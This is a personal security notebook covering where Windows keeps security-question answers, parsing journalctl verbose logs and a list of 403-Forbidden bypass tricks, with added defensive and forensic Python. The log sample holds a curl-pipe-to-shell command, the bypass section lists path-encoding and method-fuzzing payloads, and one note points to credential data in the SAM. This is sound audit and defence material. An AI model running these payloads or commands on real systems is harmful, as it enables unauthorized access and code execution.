This is just a notebook for myself. Nothing to see here, move along!
WINDOWS
Security questions: stored as UTF-16LE JSON in the ResetData REG_BINARY value under HKLM\SAM\SAM\Domains\Account\Users
Tool to read password hints: https://github.com/gtworek/PSBits/blob/master/Misc2/ReadResetData.c
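Added example (my own notebook code, not from the page above or from gtworek's ReadResetData.c): decode a ResetData blob the way the note describes it (UTF-16LE text holding JSON) and produce an audit summary that reports whether security questions are configured without exposing the answers. The JSON key names ("version", "questions", "question", "answer") and the sample blob are constructed assumptions for illustration; the on-disk layout should be checked against a real ResetData value. The winreg enumeration only runs on Windows, and HKLM\SAM is readable only as SYSTEM by default.

```python
"""Parse a Windows ResetData (security questions) blob and summarize it for auditing.
Added example; key names and sample data are constructed assumptions."""
import json
import sys
from typing import Dict, Any

# Constructed sample: UTF-16LE JSON with a trailing UTF-16 NUL, as a REG_BINARY might hold it.
SAMPLE_JSON = {
    "version": 1,
    "questions": [
        {"question": "What was your first pet's name?", "answer": "Rex"},
        {"question": "What was your childhood nickname?", "answer": "Sparky"},
        {"question": "What was your first car?", "answer": "Civic"},
    ],
}
SAMPLE_BLOB = json.dumps(SAMPLE_JSON).encode("utf-16-le") + b"\x00\x00"


def parse_reset_data(blob: bytes) -> Dict[str, Any]:
    """Decode a REG_BINARY ResetData blob: UTF-16LE text, possibly NUL-terminated."""
    if len(blob) % 2:
        raise ValueError("UTF-16LE blob must have an even number of bytes")
    text = blob.decode("utf-16-le").rstrip("\x00")
    return json.loads(text)


def summarize_reset_data(blob: bytes) -> Dict[str, Any]:
    """Audit view: question count and whether answers are present; answers are never returned.
    Assumes a top-level "questions" list of {"question": ..., "answer": ...} objects."""
    data = parse_reset_data(blob)
    questions = data.get("questions", [])
    return {
        "version": data.get("version"),
        "question_count": len(questions),
        "questions": [q.get("question", "") for q in questions],
        "answers_present": bool(questions) and all(bool(q.get("answer")) for q in questions),
    }


def audit_local_accounts() -> Dict[str, Dict[str, Any]]:
    """On Windows, list SAM user RIDs that carry a ResetData value (run as SYSTEM).
    Returns an empty dict on other platforms so the parsing code stays testable anywhere."""
    if sys.platform != "win32":
        return {}
    import winreg  # Windows-only standard-library module
    results: Dict[str, Dict[str, Any]] = {}
    users_path = r"SAM\SAM\Domains\Account\Users"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, users_path) as users:
        index = 0
        while True:
            try:
                rid = winreg.EnumKey(users, index)
            except OSError:
                break  # no more subkeys
            index += 1
            try:
                with winreg.OpenKey(users, rid) as user:
                    value, _ = winreg.QueryValueEx(user, "ResetData")
                    results[rid] = summarize_reset_data(value)
            except OSError:
                continue  # this account has no ResetData value
    return results


if __name__ == "__main__":
    print(summarize_reset_data(SAMPLE_BLOB))
    print(audit_local_accounts())
```

The summary deliberately drops the answers: for a local-account audit the interesting fact is that reset questions exist at all, since anyone who can read the SAM can read them.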
Forensics analysis of Linux systems: remember to check the journal files (/var/log/journal)
journalctl --file <file-name>.journal -o verbose > journal-file.txt
Note the use of the verbose output flag here: it provides much-needed information, such as the command-line arguments, that the default output omits.
(Source: https://twitter.com/_abhiramkumar/status/1788869652229267653)
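Added example (my own, not from the tweet or the note above): a small parser for the text that `journalctl --file <file>.journal -o verbose` writes, turning each entry into a dict of its fields so the command lines can be pulled out and screened. The sample output below is constructed, and the assumed layout is one header line per entry (timestamp followed by the cursor in square brackets) with 4-space-indented FIELD=value lines; multi-line or binary field values are not handled.

```python
"""Parse `journalctl -o verbose` text and extract process command lines.
Added example; the sample output is constructed."""
import re
from typing import Dict, List

# Constructed sample of verbose output: header line, then indented FIELD=value lines.
SAMPLE_VERBOSE = """\
Fri 2024-05-10 08:15:02.123456 UTC [s=0a1b;i=1;b=2c3d;m=4e5f;t=6071;x=8293]
    _TRANSPORT=journal
    _PID=1234
    _UID=1000
    _COMM=bash
    _EXE=/usr/bin/bash
    _CMDLINE=bash -c "curl -s http://example.invalid/x.sh | sh"
    MESSAGE=Started session

Fri 2024-05-10 08:15:03.000001 UTC [s=0a1b;i=2;b=2c3d;m=4e60;t=6072;x=8294]
    _TRANSPORT=journal
    _PID=1250
    _UID=0
    _COMM=sshd
    _EXE=/usr/sbin/sshd
    _CMDLINE=sshd: root [priv]
    MESSAGE=Accepted publickey for root from 10.0.0.5 port 51234
"""

# Header lines start at column 0 and end with the cursor "[s=...;i=...;...]".
HEADER_RE = re.compile(r"^\S.*\[s=[^\]]*\]\s*$")

# Heuristic for download-and-execute or decode-and-run command lines (constructed).
SUSPICIOUS_RE = re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b|base64\s+(-d|--decode)")


def parse_verbose(text: str) -> List[Dict[str, str]]:
    """Split verbose journal text into one dict per entry (header kept under '__header__')."""
    entries: List[Dict[str, str]] = []
    current: Dict[str, str] | None = None
    for line in text.splitlines():
        if HEADER_RE.match(line):
            current = {"__header__": line.strip()}
            entries.append(current)
        elif line.startswith("    ") and "=" in line and current is not None:
            key, _, value = line.strip().partition("=")
            current[key] = value
    return entries


def command_lines(entries: List[Dict[str, str]]) -> Dict[str, str]:
    """Map PID -> _CMDLINE for every entry that recorded a command line."""
    return {e["_PID"]: e["_CMDLINE"] for e in entries if "_PID" in e and "_CMDLINE" in e}


def flag_suspicious(entries: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return entries whose _CMDLINE matches the download-and-execute heuristic."""
    return [e for e in entries if "_CMDLINE" in e and SUSPICIOUS_RE.search(e["_CMDLINE"])]


if __name__ == "__main__":
    parsed = parse_verbose(SAMPLE_VERBOSE)
    for pid, cmd in command_lines(parsed).items():
        print(pid, cmd)
    for entry in flag_suspicious(parsed):
        print("SUSPICIOUS:", entry["_PID"], entry["_CMDLINE"])
```

Feed it the `journal-file.txt` produced by the command above (`parse_verbose(open("journal-file.txt").read())`); `_CMDLINE`, `_EXE` and `_UID` are the fields that make the verbose dump worth the extra volume.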
PenTest-things
🚫 5 Ways to Bypass 403 Forbidden 👇
If you’ve ever hit a 403 Forbidden page, congratulations, you might be on the verge of finding something juicy the developers meant to hide. 😉
1. Change the Letter Case
/admin → 403 Forbidden
/AdMiN → 200 OK
Some servers match their access rules case-sensitively while resolving the path case-insensitively. Try variations in upper- and lower-case letters.
2. Alternate HTTP Versions
Try using: HTTP/0.9, HTTP/1.0, HTTP/1.1, HTTP/2, HTTP/3
Mismatched or unsupported versions can sometimes lead to unexpected behavior — and even grant access.
3. HTTP Method Fuzzing
GET /admin → 403
POST /admin → 403
PATCH /admin → 200 OK
Try different HTTP methods: GET, POST, PUT, PATCH, OPTIONS, DELETE, etc. Some endpoints respond differently.
4. User-Agent Fuzzing
Modify the User-Agent header to impersonate different clients. For example:
User-Agent: Googlebot
User-Agent: InternalScanner/1.0
User-Agent: curl/7.64.1
Some servers allow or deny access based on what client you appear to be.
5. Path Fuzzing
Trick the URL parser using alternate path structures or encodings:
/admin/..;/
/./admin/
//admin//
/admin?
%2e%2e/admin
Even small changes in the path can bypass improperly configured access controls.
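Added example from the defender's side (my own code, not from the post above): the five tricks work when the access rule looks at the raw request and the backend looks at a normalized one. The fix is to canonicalize the path before applying the rule and to apply the rule for every HTTP method regardless of User-Agent. The `canonicalize` function below percent-decodes, drops path parameters (`;`), collapses repeated slashes, resolves `.`/`..` segments, strips the query and, assuming a case-insensitive backend, lower-cases the result; the naive check beside it is what the misconfigured rule effectively does. The `/admin` rule, the request variants and the `authorize` helper are constructed for illustration.

```python
"""Canonical-path access control versus a naive prefix check.
Added example; the rule, the variants and authorize() are constructed."""
from urllib.parse import unquote

PROTECTED_PREFIXES = ("/admin",)


def naive_is_protected(raw_path: str) -> bool:
    """The misconfigured rule: string match on the raw request target."""
    return raw_path.startswith("/admin")


def canonicalize(raw_path: str, case_insensitive: bool = True) -> str:
    """Normalize a request target to the path the backend would actually serve.
    Set case_insensitive=False if the backend treats /Admin and /admin as different resources."""
    path = raw_path.split("?", 1)[0].split("#", 1)[0]  # drop query and fragment
    for _ in range(3):  # bounded decode loop catches double-encoded %252e
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # strip path parameters, so "..;" becomes ".."
        if seg in ("", "."):
            continue  # collapses "//" and "/./"
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    result = "/" + "/".join(segments)
    return result.lower() if case_insensitive else result


def is_protected(raw_path: str) -> bool:
    """Apply the rule to the canonical path; exact match or a sub-path, not /administrator."""
    canonical = canonicalize(raw_path)
    return any(canonical == p or canonical.startswith(p + "/") for p in PROTECTED_PREFIXES)


def authorize(method: str, raw_path: str, user_agent: str, authenticated: bool) -> int:
    """Return the status to send. The decision ignores method and User-Agent on purpose:
    a protected path is protected for PATCH as much as for GET, and for any client string."""
    if is_protected(raw_path) and not authenticated:
        return 403
    return 200


if __name__ == "__main__":
    # The variants listed in the post, plus the plain path for reference.
    variants = ["/admin", "/AdMiN", "/./admin/", "//admin//", "/admin?", "%2e%2e/admin", "/admin/..;/"]
    for v in variants:
        print(f"{v:15} naive={naive_is_protected(v)!s:5} canonical={canonicalize(v):8} protected={is_protected(v)}")
```

Note that `/admin/..;/` canonicalizes to `/`: once path parameters are stripped before dot-segment resolution, the rule is evaluated on the real target, so a request that really reaches `/admin` is denied and one that resolves elsewhere is not mistaken for it. The safest deployment is to run this normalization in the same component that serves the resource, or to make the front-end rule use exactly the backend's normalization, so the two never disagree.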
Mac Forensics – some tips:
https://medium.com/@jakeperalta7/macos-forensics-101-290fa7c8201a